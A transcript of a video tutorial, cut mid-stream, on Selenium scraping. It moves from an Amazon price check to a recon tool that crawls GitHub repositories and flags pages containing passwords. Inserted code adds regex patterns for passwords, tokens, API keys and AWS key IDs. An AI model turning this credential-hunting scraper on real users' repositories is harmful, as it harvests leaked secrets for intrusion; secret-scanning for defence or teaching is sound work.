Mac, Users, Ryan, Desktop, the folder is Developer, and then we hit the chromedriver. So you will need to go ahead and install Google Chrome and then install the
ChromeDriver, and we will continue walking through how to finish setting up Selenium when you have finished doing that. After you have downloaded the zip, go ahead and unzip it, and it will automatically unzip into your downloads, and then you can drag it into a different folder like I have; I've just made one called Developer, and you can go ahead and drag yours out of your downloads, or you can leave it in your downloads if you choose. The only reason I move it out of my downloads is because sometimes I go and delete everything out of my downloads folder and I don't want to delete this if I am using it. For the Mac users, after you've downloaded this and you have moved it into your location where you would like to keep it, for me I'm going to just go like this, I will open back up this folder, I'm going to show you what we did earlier, just go to "Get Info", you can now copy this as your full path, and then we can say our ChromeDriver's, we'll go CDP, for our path, and then you can paste it in here just like this, and I believe we need to go slash chromedriver, so we'll go slash chromedriver, and this entire thing will need to be inside quotations. Now I'm going to cover the installation of Selenium for Windows users. Okay, for our Windows users, what we're going to do now is click chromedriver_win32 and it will download. We will open up where this is, it's going to say how do you want to open this file, we'll just go ahead and open it, it says we now have this chromedriver and it tells us that this is an application. If you don't have any place in particular you want to store it, go ahead and put it in your C drive, but before we do that we'll just open this up, we will make a new folder and do the same thing we did on the Mac, and we will say Developer, and we'll just leave this here, and we can go back to our downloads where we grabbed this folder and we extracted our chromedriver, and we're going to put this into the Developer. Now the reason I had to do
that is because when you look at the location of where this is stored, it is really simple to get to. It tells us that it is in C, Developer; we can copy this, we will put it inside of a string, and then we will put slash, and now we will do the same thing we did on the Mac, and we will say the ChromeDriver path, and now we have that stored as a variable. Sorry to my Windows friends, I forgot to mention that when you run this chromedriver you will need the .exe in order to get the executable to run, and pretty much everything from this point on is going to be the same as I run it on my Mac. If you have any problems please let me know in the comments and I will try to help you out. Okay, we are ready to install Selenium. So the way we're going to do this is we're going to import selenium, just like this, and because I have done it before and I have already installed it on my Mac, this is here and ready for me, but what you may need to do is, it will have a red squiggly line and it'll pop up a window like this, and you're going to click install or import, I can't remember which it is, but I think it's install, and you'll click install and it will take just a second to go ahead and install that. And then what you're going to want to do is type in from selenium, and then we're going to import the webdriver. Now that you have installed Selenium and typed in from selenium import webdriver, we're going to initialize our webdriver, and we're going to type in driver equals webdriver.Chrome, because that's the browser we're using; there are other browsers if you've chosen to go that path. And now we're going to type in our executable path, and the reason this is yellow is because this has to be capitalized like this, and we're going to type in executable_path, which I believe is actually deprecated, and I have not gone back and read the documentation for the new way to run this without the executable path, but we're going to type in CDP. It's just going to give us an error when we run this, or it's just
going to give us a warning saying that this version is deprecated for running the webdriver, but that's okay, we will get our program to run without it. It just means that they are not updating the executable path like this anymore. And now what we're going to do is type in driver.get and we're going to type in something like www.google.com, and then once this is done we're going to want our driver to close the window. So you can type in driver.close, but I don't like to use driver.close personally, because it just closes the window but Chrome will still be running down here in our browser. I want it to quit, I want it to close that window all the way out to save on my memory space on my Mac, so we're going to type driver.quit, just like this. And if you run this like I will, and you run on Windows, it's automatically going to run for us; it should open without any warnings and give us google.com and then it will close this page for us. All right, and the reason this is giving these errors is because we need to type in https:// before google.com. Now when we run this it should open up Google for us and close the file. So that is how we run it. If you're on Windows, that worked for you and you didn't get any problems. If you're on a Mac and this is the first time you've ever run Selenium, you're going to get a little error that pops up with a window and it's going to say move to trash or cancel or close. You're going to click cancel or close out of your two options, you're going to come up here, you're going to go System Preferences, you're going to go Security and Privacy, and right here it will say that you tried to run a Chrome extension and it was blocked. You will click allow. If you're not allowed to click allow, you can unlock it by clicking this and typing in your password to unlock your Mac and then click allow, and then you can relock it. Then when you close out of this and you rerun it, it will give you the option to open anyway
and you'll have a new pop-up, and you will just click open and it will begin running and working for you just like this on your Mac. Now it is time to begin some of our web scraping.

Okay, so we are at our screen and it looks like this. I've decided to go ahead and show you how to get rid of this deprecation warning. So when we run our program and it runs this right here, telling us that the executable path has been deprecated, just in case they stop using this in the future I want to go ahead and show you the way to get rid of this. I'm going to use running the executable path because I believe that it is faster (and I might be wrong, and that's okay), and you can run Selenium however you choose; you can run it the deprecated way or the current version, I think they're on version 4, if you choose. But we'll have to import a few more services from Selenium, so we'll go from selenium.webdriver.chrome.service import and then we're going to import Service, and then we're going to need to import the ChromeDriverManager, so we're going to go webdriver_manager.chrome and we're going to import ChromeDriverManager, just like this. Now I'm going to comment this out because I'm going to use it as we go through, but you can delete this if you want to use the non-deprecated version. And I think you're still going to get these red outputs down here, or these red warnings, that's going to tell you it's installing the newest version of the webdriver every single time you run it, but that's okay. And we're going to type in s = and then we're going to type in our Service and then we're going to run our ChromeDriverManager and we're going to call this and then we will call the install function. And the reason we're going to do this is because every time you run this service it is going to check to see what version of Chrome you are running. So we'll just comment this out so we're not getting this warning, and this dot needs to go, I did this wrong, we'll go like this. All right,
it is not wanting to work for me, so we'll close it off manually, and then we're going to hit .install right here, we're going to call this method, and then we have to close off this whole line here. And now we're going to turn this over to our driver, and it's going to equal webdriver.Chrome and then we're going to use the service and it's going to equal s, just like this. Now if we uncomment our driver down here we'll have no errors, and when we run this it will now work for us, and it's going to tell us this is the version of Google Chrome that we're using (if you remember, we checked our version earlier and then we installed the chromedriver), and it tells us we have the chromedriver that matches our version and it is found in cache. So it now works. This is the non-deprecated way to run this tool. I decided to go ahead and show this to you, like I said, just in case the way right here, the deprecated version, to get to the chromedriver is no longer supported in the future.

All right, I have gone ahead and commented out this code and I'm going to use the chromedriver that is on my computer that we already installed. There's one more thing we're going to need to import in order to not get any deprecation errors, and that is By. We're going to import By, so we're going to type in from selenium.webdriver (not .chrome, sorry) .common.by and then we're going to import By, like this, if I can get back there, like this. And this is another update with Selenium; the way I originally learned Selenium we didn't have to use this, but they have updated it again, so we will need to use this By module here. So what we're going to do is open up Amazon and I'm going to show you how this scrapes. If you've ever wondered why you have to answer questions to make sure you're not a robot, you're going to find out in this course. So if we come over to a web browser and we type in Amazon and we go to Amazon, and let's say we want to buy a
new drill bit, so we just say we want a drill set. Okay, we're getting a drill set, not a drill bit, and we click on this drill, and we really want this drill but we don't want to pay 43 dollars for it, we want to pay 38 for it. We can actually set up our webdriver to go out and check this price for us. So what we would do is we would inspect this and we can look for the class right here, and it's going to tell us that it's 43. So you could set this up; let's say instead of 43.99 we don't really care about the 99 cents and we just want it to be less than 38, so 37.99 would work. We could use this span, but for the sake of getting the 99 involved we will use this one right here for our project. So we'll go ahead, click on this, and we're going to use this class right here, and we're going to grab a class out of these right here, and we want to grab one that looks really unique, that isn't going to be used anywhere else, and this class looks really unique to me. So I'm going to go ahead and copy this and then we'll come back over to our chromedriver, thank you, and underneath of our google.com we're going to type in price = and then we want the driver to scan through all of this source right here, the HTML, and we're going to tell it we want to find an element, and we want an element by a class name. So we want to make sure we don't have find_elements_by_class_name; we want a single element by the class name. Later we're going to use the one with the s. And this is the deprecated version, I forgot, this is the version that I learned when I was using this. What we do here now is we delete all of that and we delete that and we come in here and we say By.CLASS_NAME, and in here we're going to put that class name that we just copied, just like this. The next thing we need to do is update this https right here, and it needs to be this URL right here, so that way our chromedriver opens up the right URL, scans through all the HTML, it's going to look for the class name that possesses this, and then we want
it to print the price, like this. So we'll say print and then we want to print the price. So if we run this how it is right now, I'll show you what our output is: it gives us this as our output, and this is not helpful. So what we need to do in order to grab the plain text is type in .text. So now if we run it, it's going to print out for us our 43.99. And I'll show you what would be useful: if we're really going to turn this into a web scraper for us, it really would be useful to get rid of this 99 and just use this right here. So you can see why it's printing the way it is; this span is 43.99 and it's given it to us on different lines. So we should be able to copy, let's try this class right here, and this really is, when you're making these, going to be a lot of trial and error, as you're going to see in a little bit when we make our new dumpster diving ethical hacking tool and we try to automate some of our recon, where it's going to be a lot of trial and error. So we'll let this run, and we get the dollar sign; that is not what we want, so we'll try this one and we will paste this in here, and now we can run it and see what comes back, and we grab just the 43.
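The price scrape above, restructured as an added example (not the video's code) so that the parsing and the threshold check are plain functions that can be exercised without a browser. The split "$43 / . / 99" text is a constructed sample of what element.text returned; the URL, class name and headless Chrome options in the fetcher are assumptions for illustration. Selenium is imported only inside the fetcher, so everything else runs offline.

```python
"""Price watcher around a Selenium scrape, with the parsing kept pure.

Added example, not code from the original video. Assumptions (not from
the page): the hypothetical URL and class name used in main(), and that
Selenium 4 with a chromedriver on PATH is installed when the live fetcher
is used.
"""
import re
import time
from typing import Callable, Optional

# Constructed sample of what element.text returned in the video: the price
# is rendered as separate spans, so the text arrives split over lines.
SAMPLE_PRICE_TEXT = "$43\n.\n99"


def parse_price(raw: str) -> Optional[float]:
    """Turn scraped text such as '$43\\n.\\n99' or '$1,299.00' into a float.

    Returns None when no digits are present, so a changed page layout
    (the 'trial and error' the video mentions) fails loudly instead of
    comparing against a bogus value.
    """
    # Collapse newlines/whitespace and drop currency symbols and commas.
    cleaned = re.sub(r"[\s$,]", "", raw)
    match = re.search(r"\d+(?:\.\d+)?", cleaned)
    if not match:
        return None
    return float(match.group(0))


def below_threshold(price: Optional[float], threshold: float) -> bool:
    """True only when a price was parsed and it is at or below the target."""
    return price is not None and price <= threshold


def watch_price(fetch_text: Callable[[], str], threshold: float,
                interval_s: float = 300.0, max_checks: int = 12) -> Optional[float]:
    """Poll until the price drops to the threshold or max_checks is reached.

    fetch_text is injected (a Selenium scrape in production, a stub in tests)
    and max_checks keeps this from becoming an infinite loop.
    Returns the price that met the threshold, or None if it never did.
    """
    for attempt in range(max_checks):
        price = parse_price(fetch_text())
        if below_threshold(price, threshold):
            return price
        if attempt < max_checks - 1:
            time.sleep(interval_s)
    return None


def selenium_fetcher(url: str, class_name: str) -> Callable[[], str]:
    """Build a fetch_text callable that opens a fresh headless Chrome per check.

    Selenium is imported lazily so the pure functions above stay importable
    without it. driver.quit() (not close()) releases the whole browser process.
    """
    def fetch() -> str:
        from selenium import webdriver
        from selenium.webdriver.common.by import By

        options = webdriver.ChromeOptions()
        options.add_argument("--headless=new")  # assumption: Chrome 109+
        driver = webdriver.Chrome(options=options)
        try:
            driver.get(url)
            return driver.find_element(By.CLASS_NAME, class_name).text
        finally:
            driver.quit()
    return fetch


if __name__ == "__main__":
    # Offline demo on the constructed sample text.
    sample = parse_price(SAMPLE_PRICE_TEXT)
    print(sample, below_threshold(sample, 38))
    # Live use (hypothetical URL and class name; needs Selenium + chromedriver):
    # hit = watch_price(selenium_fetcher("https://www.example.com/item", "a-price-whole"), 38)
    # print("price dropped to", hit)
```

Injecting the fetch function is what makes the loop testable: the same watch_price runs against a stub that returns a scripted sequence of prices or against the real browser scrape.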
So now if we wanted this to run, say, every 20 minutes to see if Amazon has updated their price and brought it down below 38 dollars, we're gonna put all of this inside of a function that is going to get called every 20 minutes, and we're going to have to import a new module for this, and we're going to do that in the next section.

All right, now that we have our web scraper working, let's say we wanted to go out and check the price every five minutes or 30 minutes or whatever we want it to be, and then let us print it into the console. What we would do in this case is put this into a while loop. And so what we can do is take this and we can say while on, and then we want the on to be true all the time, so we'll say on = True, and this should be familiar to you if you have gone through the first part of our Python for hackers. And then we're going to need this inside of a function that gets called every four seconds or 30 minutes; we'll need this inside of a function that gets called every so many minutes. In our case I'm going to set it to only five seconds so that way we don't have to wait very long, but in a real case scenario you would make this run maybe once a day or every couple of hours to check the price. But for now we're going to make a function and we're going to call it five, we'll call it five_seconds, we'll call our function, and then we will need all of this to be inside of our function, and now we need to call the function like this, and we will say five_seconds. And then we are going to take this and we need this to sleep, so we'll say time.sleep, and you will need to import time up here if you have not already, and we're going to say sleep for five seconds. Now when we run this it's going to take five seconds, it's going to launch our driver, go out, check the price, and print it down here in our console for us, and then once it gets done doing that it's going to wait five more seconds and then it is going to launch the browser again and check the price for us, and it
will do this for all eternity, because we are inside what's called an infinite loop. There's no way for this loop to end, and so it's just going to keep on going and printing for us the price until we stop the program. So this isn't really helpful for us in the world of hacking, so we're going to stop here. I just want you to get this concept down of using Selenium, setting up functions, using a while loop. If we were to use this completely for our daily use, we would have to make an if statement and say if the price is equal to or less than 38 dollars then we would import another module and we would have it send us an email or a text message saying the price is ready for us to go and buy it. But we're not going to finish this out, because it's not really going to be helpful for us in the world of hacking, so we'll move on to building our actual tool for hacking.

I have cleaned out my text editor here just to get it down to the bare bones of what we are going to need as we build this tool. I have put this right here: this is the GitHub repo that we're going to be going through and dumpster diving. For now, this should work for any GitHub page if we program this right, but I made this GitHub page just for us to test against, to make sure our tool is running. I didn't want to spam an actual GitHub account that is in use, so this is just a GitHub account that I made for the purpose of showing you how to build this tool. So what we're going to make in the end is a tool that, when we run it, it asks what target would you like to run against, and so we're going to copy the URL of the GitHub page that we want to scan, and when we run it it's going to go out to GitHub, it's going to click on the repo, it's going to click on the code, it's going to go to the raw, and then it is going to tell us a password was found inside this page. And so what you could do is just copy this, or click on it, and it will take you to this GitHub page and you can search for where this password was used. So
we're going to make a very basic program, just like this one. I hid a lot of the code, it's down there, I didn't want you to get a head start. So as we make this tool, when we're done it's going to be very basic, but I would challenge you to make it your own and add to it: different files that you want to search for, different keywords, make it print the entire line where the password's found so you don't actually have to go out to this page and check it. These are things that I've done with my tool that I've made, just like this, and so I want to show you guys how to get started making this tool and then add on to it and make it your own.

Okay, as we go through building this tool there are a few things we're going to do at the beginning that I'm going to tell you to change at the end, to make the entire tool work well for you. So what we're going to do at the beginning is we're just going to get rid of this right here, because we want to put in our repo that we're going to be scanning against. And I'll leave that GitHub repo up unless it ends up getting taken down by GitHub because it is getting scraped over and over and over by people from all over, but until then I'm going to just leave this GitHub page up for you guys. So we'll just put that inside of our GitHub page, and now we can comment this out, and it should open up that page for us and then quit. And it did, so there it ran. And what we're going to do in the end is we will change this and we will make this an input, but we're going to cover that at the end when we get to that section. Now that we have it so it'll open up this page for us, we want it to grab something for us by an element, and because usually there's a bunch of repositories in here we're going to just use the repositories. Instead of getting the element by, let's say, the class name, get the element, we're going to make it get elements by class name, and I'll show you what I mean in just a second. So we'll go in here and we will say we need
this class titled repo. Okay, and this is what these will be titled as for us, and we have this anchor tag right here. So what we're going to do is we'll do the same thing we did in the last one. We're going to say that the repository, and we'll name this as, we'll call this our res for resources, and we're going to turn it into a variable, and it's going to get for us all the repos by the class name. So we'll say driver.find_element and then we want this to be an s, and the reason we want this to be an s is because we want to find all the elements and we're going to store them inside this variable. Now for this case there is only one right here, but this should work with many repos if you scan a GitHub page with many elements with the class name of repo. So we'll continue and type in By.CLASS_NAME (we don't want CLASS, we want CLASS_NAME, like this), and the class name is repo, just like this. Now if we run this it will go and it will click this page and then it will close. So what I want to do is I'm going to add in time.sleep and we'll make this two seconds so that we can see what's happening, and then we'll make another time.sleep right here so that you can see that it clicks onto the next page. So we'll run this; it's going to open and wait two seconds, and then it's going to open this repository right here and close. So now what we need to do is make a for loop so that way we can print the repos that are on this page, and in this case there's only going to be one, but we're going to go ahead and make this for loop. And we'll say for i in all these listed resources we want to print, and we want to print i, and what we would do here is we'd say print i.text, because we want to see it in the text format, and then it will print for us. I should have gotten rid of the sleep for us, and I see I spelled that wrong, and that's okay, I made that repository late at night and it's all right that it isn't quite right; it's still a repository and we can
still scan against it. So it prints for us this repository right here. So now that we know we can loop through all of the resources that have the element class name repo, we need to figure out how we can click on those. And there is a click function that we're going to use later, but right now I want us to go through and see how we can do this a different way. It's going to be a little more complicated, but it's always best to know there are multiple ways to do something, especially in the world of coding and in the world of hacking.

All right, because we're not going to use the click function, we need to see what happens when we click on this link right here. Now this is something in cyber security that you're going to need to always do when you're testing a page (not that we're testing GitHub), but when you test a page it's always good in practice to click and see what happens, how to use the page, to see what's going on. And what we're going to do is check out this URL. So this is the URL that we start out with, and since it just changes the repo name into the new directory, what we're going to need to do is take this directory and put it into a new link and get our webdriver to open this up. Since we know we can run this (and I'll go ahead and comment out these time.sleeps because we don't need those anymore), since we know we can run this and we can get it to scrape all of the repositories and then print them down here, now we can just save these into a list and then we can loop through that list and get it to append that to our URL. This is a little more complicated than the click function, but it's helpful because we will need it so that way we can get it to open every single repository that we go through in the future, when we go through a page that has a lot of repositories on it. So what we will end up doing is making a list, which you've seen in the past, and if you want you can pause the video and see if you can figure out how to make a list on your own if you remember. And so I'm
just going to name our list as links and we're going to make it empty. And what we're going to do now is we're going to take this and we're going to say links.append, which I don't think you've seen before, and we want to append i. So now if we take this and we move it over, and we print, we need to append i.text so that way we get it right, i.text, and now we print the links right here; we should get the repository to print from our list. So we'll run this and give it a test, and it says we have the repository and we have the brackets and it is inside the list. So what we will do now that we have this list is we're going to make another for loop, and we can comment this out because we don't need that to print every time. And in this for loop we're going to name it for l, for the links inside the links list, and we're going to make a new variable and we're going to call it next_page (and this is when I tell you my variable naming becomes very poor because I'm not very creative), and we're going to make this an f-string, and we're going to call the repo. But we need to first name it something, so we need this URL to be assigned to a variable, and so we'll just call this our repo, and at the end we're going to change this because this is going to be an input, and we're going to make this a string, just like this. And now we have this repo right here, and we'll add a slash so that way we don't have to later. Actually, we'll delete the slash and we'll add it down here in our string, to give us some practice with that. So we're going to take this repo, and because it's a variable it needs to be in an f-string with these curly braces, and we're going to add in our slash, and then we will add in another variable, which is going to be our l. So what would happen if we had a bunch of repos: this is going to go through all of the links, which we saved right here as our resources, it's going to get all the links, this for loop is going
to run through all these links and it's going to put them into our list that we have called links, and if you remember this is where our repositories will be saved. Now we need to loop through there, and in this for loop it's going to loop through our links and it's going to give us a new URL. So what this URL will look like after it runs through this second for loop is it will look like this, and it will come out with our respository (that I spelled wrong), and it's going to open up this page and it will go and click this link for us. So this is the repo we want to attack; it will click this and it will bring us to this page. So let's go ahead and try this; we're going to run this with a sleep command when we are ready. So what we need to do at this point is store our next_page in a new link, and we'll just call this our final link, so we'll just call it f_link, and we will save this into a list, and then we're going to append our new URL, remembering what this one right here is going to look like, because it's going and looping through a second time over this links and it's making our new URL that we want to test, which is going to be this one right here. And we will tell this to append, so we're going to do f_link.append and we want to append the next_page, and we're going to want it to append the next_page right here. So as we have this next_page, if we print this, I'll show you what it looks like. So if we print this we can say print and then we're going to print the f_link, and we'll just go ahead and pull this back here, and we will run this and it'll show us what our new URL looks like. I accidentally left this slash; that's okay, the browser would have just deleted this second slash. So now if we run it again it's going to spit out for us this new link, and if you copy this link or just click on it it will take you, we'll just click on it, it'll take you to this page. And so that is how far we have gotten; so now we have moved with Selenium from this page to the
next page, and where we're headed is inside this main.py, and then we're going to go into the raw, and then we want to know if in any of this there is a password or some kind of keyword. And so I'll just show you: if we type in Command-F and we type in pass, we'll see this password admin. We're going to make our program go through all of these words and all these lines inside this text and pull down the password for us. So that's where we're headed, but right now we've got a few pages more we need to move. We are right now on this landing page right here, so we'll try and figure out how to make it open this page and then go into the raw and then search for the password. So we'll keep going in the next section.

Okay, it is time to call our first function. So we can go ahead and comment out this print statement right here, and we can call our first function, and we're going to call it above our for loops, because the function needs to be located above where we call the function. So we will call this function, we'll just call it loop because we're going to loop through all the links, so we will call it like this, we'll say loop, and then we're going to pass in the next_page because that's what we want to go searching through in this function. So this is red because we haven't declared our function, and we'll declare it up above, and we will say def and we'll call it our loop, and then we're going to pass in a parameter; we'll actually just call it our next_page, that way we understand what's happening, next_page, and we have to add in our colon there. And now what do we want to do, now that we can get to the next page? There's a couple of things we need to do. The first thing is we need to open that new page, so we're going to type in driver.get and then we want it to open that next_page. So let's see what happens; we can come right here, we'll just not run the time function and have it sleep and see what happens. So we'll run this and
see if it opens the page, and we can see it, or it goes too quick. It went too quick, so we'll stop right here and we'll say time.sleep and we'll sleep for two seconds, that way we can see if it actually opened the next page. And it opens the next page and then it quits. So now that we know we're able to get to the next page, we need to be able to open this file right here and get to this Raw button. So in order to do that, what I think would be best is to inspect this link and see if we can find what specific class these links all have in common, so that way we can run Selenium to pull all the links that would hold every single file within this repository. So we can inspect this and it will tell us this is the line, and so we'll just go ahead and click this first class and see if it works. So we'll just copy this, and now we'll need a new resource, so we'll just call it resource2, because I'm terrible at naming variables, and if I had more time to think about it I would probably come up with something better, but you can name it whatever makes sense to you. If I made this tool and somebody else just saw it online they wouldn't be able to understand what's going on because I suck at naming variables, but you can name your variables better than me, so I'm going to let you name your own variables, but I'm going to name mine resource2. So we're gonna go driver. and we're going to do a find_elements just like this one, and then we're going to say By.CLASS_NAME, this should be getting familiar to you by now, and then the class name is the one we just copied. If this works it should be able to print for us this class right here; we'll see if we can actually get it to print main.py. So what we'll do is we'll print, and then we'll print resource2.text. Okay, apparently we don't need .text, we'll just print resource2 and see what happens.
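The link-following part of the tool above, as an added example that is not the video's own code: the repo and file URLs are built with plain string functions rather than inside the Selenium loops, the file selection is an extension check instead of a chain of if/elif tests on link text, and a keyword scan is run over fetched file text, which is what the tool needs once it reaches the raw file. Everything uses a constructed sample file; the GitHub blob-to-raw URL mapping, the example profile and repo names, and the secret patterns are assumptions, not taken from the page. Selenium is only needed to obtain the link texts and page_source, so none of this needs a browser to test.

```python
"""Browser-free core of a GitHub 'dumpster diving' scanner.

Added example, not the video's own code. It assumes GitHub's public URL
layout (github.com/<owner>/<repo>/blob/<branch>/<path> is served raw at
raw.githubusercontent.com/<owner>/<repo>/<branch>/<path>) and uses a
constructed sample file instead of a live repository.
"""
import re
from urllib.parse import urlparse, urlunparse

# Constructed sample standing in for driver.page_source of a raw file.
SAMPLE_RAW_FILE = """import requests

API_KEY = "AKIAIOSFODNN7EXAMPLE"
user = "admin"
password = "admin"  # TODO remove before commit
print("hello")
"""

# Extensions worth opening (py first, then js, php, json); extend as needed.
SOURCE_EXTENSIONS = (".py", ".js", ".php", ".json")

# Keyword / assignment patterns for a first pass; tune per target.
SECRET_PATTERNS = [
    re.compile(r"(?i)\b(pass(word|wd)?|secret|token|api[_-]?key)\b\s*[:=]"),
    re.compile(r"\bAKIA[0-9A-Z]{16}\b"),  # AWS access key id format (assumption)
]


def repo_url(base: str, repo_name: str) -> str:
    """Append a repo name scraped from the profile page to the profile URL."""
    return f"{base.rstrip('/')}/{repo_name.strip().strip('/')}"


def select_source_files(names, extensions=SOURCE_EXTENSIONS):
    """Keep only link texts that look like source files we want to read.

    An extension check replaces chained 'if "py" in a.text ... elif "js" ...'
    so that a name such as 'happy.txt' is not mistaken for Python.
    """
    return [n for n in names if n.lower().endswith(extensions)]


def file_page_url(repo_page: str, file_name: str, branch: str = "main") -> str:
    """The 'blob' page a file link leads to from the repository landing page."""
    return f"{repo_page.rstrip('/')}/blob/{branch}/{file_name}"


def raw_url(blob_url: str) -> str:
    """Where the Raw button resolves to, derived from the blob URL.

    Relies on the GitHub layout stated in the module docstring.
    """
    parts = urlparse(blob_url)
    segments = parts.path.strip("/").split("/")
    if len(segments) < 4 or segments[2] != "blob":
        raise ValueError(f"not a GitHub blob URL: {blob_url}")
    owner, repo, _, *rest = segments
    new_path = "/".join([owner, repo, *rest])
    return urlunparse(("https", "raw.githubusercontent.com", f"/{new_path}", "", "", ""))


def find_secrets(text: str):
    """Return (line_number, line) for each line that matches a secret pattern."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if any(p.search(line) for p in SECRET_PATTERNS):
            hits.append((lineno, line.strip()))
    return hits


if __name__ == "__main__":
    # Hypothetical profile and repo names; only the string handling runs here.
    page = repo_url("https://github.com/example-user", "example-repo")
    for name in select_source_files(["README.md", "main.py", "app.js"]):
        blob = file_page_url(page, name)
        print(blob, "->", raw_url(blob))
    for lineno, line in find_secrets(SAMPLE_RAW_FILE):
        print(f"possible secret on line {lineno}: {line}")
```

Keeping the URL building and the scan out of the browser code means the Selenium part only has to hand over link texts and page_source; the elif chain the video suggests grows into SOURCE_EXTENSIONS, and SECRET_PATTERNS is where the extra keywords go. Printing the line number and the line itself is the "print the entire line where the password's found" improvement the video mentions.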
And that has run, and it does need resource2.text, and the reason that this is not working is because we need it to loop through this resource, this variable that could be holding multiple links within it. So like we did down here, we will need to go for, and we can call this i if we want, but I'm going to change it so that way you don't get confused by all these different variables in our for loops; we'll call it for a in resource2, and then instead of resource2.text we're going to print a.text, so that way we can make sure it is printing for us the main.py, so that way we can tell it to click on main.py. And now what we're going to do is we're going to do a comparison inside of an if statement. We're going to comment this out, and instead of getting this little error right here we're going to type in pass so that way it will ignore the error for us, and we're going to say if the letters together "py" are in a.text then we want to do something; we're going to say print it worked, py is in the text. So now if we run this right here, oh, I see an error, we're going to get a problem. It says it worked right here, but the reason we get this right here is it says this is a local variable inside of this segment. So this is really not good practice; if you were working for a company as a programmer you wouldn't do this, but we're not looking to work in a company as programmers, we're looking to use programming for hacking. And so what we're going to do is we're going to make this a global variable; we're going to say a is now a global variable and can be accessed anywhere, and it gets rid of this for us. The reason you wouldn't want to make this global: let's say we made this for loop with the i and we said it's a global; now this i variable everywhere we used it is going to be everywhere in our code, so we cannot use the variable a anywhere else
outside of this, because we have made it a global variable, and that is really not good programming practice, but for the sake of our tool it doesn't really matter, so we're going to use it. We'll run this and it should work for us, and it says it worked, a py is in the text. What we'll do is we can do the same thing we did before, and we can click on this main.py and look at our URL so that way we know how to structure it, and then after this time I promise we'll use the click function (or the click method, actually) and it'll make it much easier for us. So the way we would go about this, we'll delete this, is going to be similar. If you want, you can try and do something like this and get the next page based off this URL that we see right here, so if you want to take this challenge you can go ahead and do this now, and for everyone else I'll walk you through it. Now we'll call this, uh, we'll just call it second_page (because I'm so good at naming variables), and then we're going to make this an f-string just like we did down here, and we're going to add all this together to get that new URL. So we're going to go ahead and we're going to say repo, and let's see, what did we name this one down here? We'll just call it repo because we have the repo up here; we'll just copy this, actually we'll just leave this, so we'll just use the repo how it is, and then we'll just add in this right here, and we can copy that and paste it in, and then we'll add our slash for the new page that we're going to want to go to, and we'll add this variable in right here, a.text, so we'll say a.text. And now if we print second_page we should get a URL printed that looks exactly like this. And the reason we did it this way is because we're going to be looping through in this for loop all of the links, and we need these links right here. So if there was, let's say, a main.py and then we had a main.css and then we had an index.js and then we had index.html, or we had file.php, and there's a whole
bunch of files inside this program, we would want to loop through all of these files for us. So what we're going to do is set it up this way so you can add to it; as an example, it would be like if "js" is in a.text then it would do the JS instead of py for us. So that's actually a challenge for you; I'll show you how to add those on and then I'll let you complete the tool as you see fit. So what we're going to do for now is we're just going to print this second_page, and it's going to open it, and it's going to tell us right here, and we can even add in a time.sleep so that way you can see that it has worked. So it did print for us right here. Okay, so I just noticed if you click this page it takes us to a page not found, and when you compare the two URLs we're missing this repository right here. So what we will need to do is add in an extra repository, and let's actually see if we can just grab this next_page right here. So we're looping through what would be considered the next page; where's our links at? Okay, so we'll see if we can loop through the next_page right here. So we'll add in, instead of repo, we need it to have that repository on it, so we can say next_page, which is getting passed through our function, and now let's print it and see if this works for us. It's paused, and we have the repository, and if we click on it it brings us to the next page that we want. And if we were going to add on to this program, let's say, like I was showing you, if there's JS inside the file, so like if this is a JavaScript file instead of Python, or maybe we want to check for JavaScript and Python and maybe later we want to add PHP, we can do that. And so we can say a.text and then we can say right here, we need to close this off, and then we could say this exact same thing, and then we would print whatever it is that we want to test for. So we would say we're going to go to a new page if a JavaScript file is found, then we're going to do this, and then we would turn this into an elif and it
would say okay there's no Javascript file so because there's no Javascript file we're going to check for a python file and so we'll go ahead and run this make sure we have no errors and it's going to pass this Javascript file and it's going to go straight into the python file for us so we run this and it passes this right here and then it closes and it pulls down the main dot Pi so what you would do if you wanted to make this a comprehensive tool you would say if there's a PHP if there's JavaScript if there's a Json and any other kind of file that you might want to check for sensitive data but because the repo we're working with to build this tool doesn't have any of that I'm going to just leave it with python and I'm going to challenge you to make the if statements and the Lyft statements and the else statements all on your own and maybe you can go look at repos and see what you want the program to open up to look for passwords now that we know that works we're going to comment out this sleep function because we don't need it we also don't need it to print the second page what we're going to do now is we're going to call a second function inside of this function so it's kind of getting like the movie Inception we have a function that we're calling inside of another function but we're going to do this one in a much easier method so we're going to go ahead and we're we're going to call this one function is going to be called going for raw and I'll show you why I'm naming it that going for raw this is going to be the best variable name I have ever come up with and then we're going to pass in the second page and then we'll make the function up here and we'll call it def and we're going to call it going for raw we'll call the function we're going to pass in second page this is actually going to be the third page we might actually change this inside here this parameter in just a second so what we are going to be doing is going for the raw so now that we're able to get 
to this page we want to click this button so that way we can get to this page so in order to click this button it is going to be so much easier than what we've been doing as we've been editing this right here the URL and adding to it what we're going to do is just click the button so we can inspect this right here and C where is it we'll inspect see if it can pull it up for me okay now that we have inspected it and you can see when we hover over this right here we can see this RAW button so now what we need to do is the same thing we've been doing and we need to find a class and see if we can find a class that is used only with that button and get it to open up this raw so that way we land on this page right here we're just going to copy that class name that I just showed you right here and see if that can open up this tab for us so now under this function what we're going to do is we're just going to say we're going to type in raw equals and then we're going to say driver dot find elements actually this time instead of elements plural we're going to do just one element and we're going to say by dot class name just like we have been and then we will type in we'll paste in our link right here and now what we're going to do is something really simple we're just going to say raw dot click and it's going to click that button for us and then what we'll do is we'll come over here we'll click this okay now that we're able to get to this page we're going to tell it that we want the page Source we're going to want it to right click and say view page source and then we're going to grab all of this inside of an F string and then see if we can find a password in it and what that's going to look like is something like this we want the HTML HTML and we're going to say driver Dot Page source that way it grabs the page source for us like we I just showed you as the same as right clicking it in view page source we wanted to grab that and then we're going to put this into an F 
string and we're just going to change the HTML we'll just use that same variable and we'll say HTML is going to be equal to this HTML inside of an upstream because we want it to be converted into a string so we'll say HTML so now we have this in a string and just to check it we can say and just to check this we can say print and then we want to print HTML and now when we run this it's going to print all of that page source for us into our console and we want to make sure that it is in a string did I we have an error let's see if we let's see if we can find the error here we need to use driver dot get and then we need to get the second page right here so now if we run this it should work and it clicked the button and it printed all of this for us and let's see if it printed here we have the tags for us and now that we have this printed and it's printed inside of the HTML so we know we grabbed the entire page we can close out of this we don't need this print statement what we're going to do now is really similar to what we did down here we're going to say if the password is in HTML we want it to print found a password so we'll say print found password and now we can run this and if it finds the word password inside of the HTML it's going to print found password and if we wanted to we can turn this into an F string and it we can get it to print for us the actual URL where the password was found and we can say something like this we'll make this an F string and say we want to print second page so it'll say found the password and it'll print the page for us and we could click on this second page and go to it 